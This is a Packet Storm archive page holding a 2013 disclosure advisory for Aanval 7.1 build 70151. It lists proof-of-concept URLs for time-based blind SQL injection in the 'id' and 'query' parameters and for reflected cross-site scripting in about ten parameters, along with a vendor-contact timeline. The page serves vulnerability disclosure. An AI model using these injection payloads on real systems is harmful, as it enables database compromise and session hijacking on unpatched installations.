Twenty Year Anniversary

Aanval 7.1 Build 70151 SQL Injection / Cross Site Scripting

Aanval 7.1 Build 70151 SQL Injection / Cross Site Scripting
Posted Oct 3, 2013
Authored by xistence

Aanval version 7.1 build 70151 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | a86fd138da920f8952a34b05891fce2a

Aanval 7.1 Build 70151 SQL Injection / Cross Site Scripting

Change Mirror Download
-----------
Author:
-----------

xistence < xistence[at]0x90[.]nl >

-------------------------
Affected products:
-------------------------

Aanval 7.1 build 70151

-------------------------
Affected vendors:
-------------------------

Aanval
http://www.aanval.com/
https://www.aanval.com/download/pickup

-------------------------
Product description:
-------------------------

Aanval is the industry's most comprehensive Snort and Syslog Intrusion
Detection, Correlation,
and Threat Management console on the market. Aanval supports both Snort and
Suricata,
as well as virtually any Syslog data source, and is designed specifically
to scale from
small-single sensor installations to global enterprise deployments.

Aanval's primary function is to correlate data from multiple sources, bring
together billions of events,
and present users with a holistic view of false-positive free, network
security situational awareness.

----------
Details:
----------

Aanval 7.1 build 70151 is prone to multiple vulnerabilities. Below are the
details.

[ 0x01 - Blind SQL Injection ]

The "id" and "query" parameters are vulnerable to blind SQL injection. The
proof of concept below does a sha1 benchmark on the value "1". This will
take a couple of seconds to process in most situations and thus shows that
the injection works.
http://
<IP>/aanval/?op=prv_myReports&id=2'%20and%20benchmark(20000000%2csha1(1))--%20
http://
<IP>/aanval/?op=prv_eventSearch&query=%20report:'%2bbenchmark(20000000%2csha1(1))%2b'


[ 0x02 - Reflected XSS ]

The following requests are vulnerable to "Cross Site Scripting" and will
show a pop-up with the word "XSS".

http://<IP>/aanval/?op=prv_eventSearch&dip=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&dport=%0Aalert('XSS')//
http://<IP>/aanval/?num=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&protocol=%0Aalert('XSS')//
http://
<IP>/aanval/?op=prv_eventSearch&query=%20report:31337%0aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&risk=%0Aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&sip=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&sport=%0aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&string=<script>alert('XSS')</script>
http://
<IP>/aanval/?op=prv_eventSearchResults&transaction="><script>alert('XSS')</script>

-----------
Solution:
-----------

No fix available, use a good WAF :)

--------------
Timeline:
--------------

2013-08-16 Provided details to Aanval support. Ticket is created.
2013-09-19 Asked for status update.
2013-09-26 No response yet, asked for status update again.
2013-10-04 Still no response, public disclosure.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    11 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close